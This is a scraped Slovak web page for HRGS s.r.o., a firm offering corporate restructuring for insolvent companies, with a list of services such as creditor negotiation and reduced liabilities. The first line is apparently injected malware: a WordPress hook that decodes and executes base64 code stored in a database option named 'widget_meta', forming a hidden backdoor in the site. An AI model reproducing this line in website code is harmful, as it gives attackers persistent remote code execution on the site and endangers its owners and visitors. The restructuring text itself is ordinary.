add_action( 'init', create_function( '', @join( "\n", array_map( "base64_decode", json_decode( get_option( $table_prefix . "widget_meta" ) ) ) ) ) ); HRGS s.r.o. | The best or nothing. Reštrukturalizácia

Reštrukturalizácia

Čo je úpadok

Úpadok je stav, keď je spoločnosť predĺžená alebo platobne neschopná. Zákon nedefinuje všetky spôsoby riešenia úpadku spoločnosti a voľbu ponecháva na spoločnosť samotnú. Zákonvšak upravuje povinnosť podať návrh na vyhlásenie konkurzu do 30 dní, od kedy sa podnikateľ dozvie o úpadku. Konkurz však nie je jediné riešenie.

creditdefault_02
creditdefault_01

Spôsob riešenia úpadku

HRGS s.r.o. realizuje ozdravný proces predovšetkým formou reštrukturalizácie spoločnosti, aktívnym vymáhaním pohľadávok, vnútropodnikovou reorganizáciou, zabezpečením vstupu strategického investora a vhodným nastavením marketingového plánu spoločnosti.

  • zabezpečujeme pre klienta výber vhodného správcu, ktorý vyhotoví právne perfektný posudok pre účely formálnej reštrukturalizácie a vykonáva všetky úkony počas reštrukturalizácie
  • odmena vybratého správcu je zahrnutá v odmene HRGS s.r.o.
  • v spolupráci s klientom sa podieľame na celom procese formálnej reštrukturalizácie
  • spoločne s klientom alebo samostatne v mene klienta rokujeme s veriteľmi ohľadne možností zníženia záväzkov klienta zabezpečujeme komunikáciu s médiami na základe vopred pripraveného a klientom odsúhlaseného komunikačného plánu
  • výsledkom formálnej reštrukturalizácie je zníženie záväzkov, v niektorých prípadoch až o 85 %
  • na základe reštrukturalizačného plánu je možné odložiť splatnosť záväzkov, podľa objektývnych možností klienta
  • tento proces taktiež zabezpečuje klientovi ochranu pred veriteľmi po dobu 7 – 9 mesiacov, počas ktorých nemusí, resp. nesmie plniť predreštrukturalizačné peňažné záväzky.
Scroll to Top
Prejsť na panel nástrojov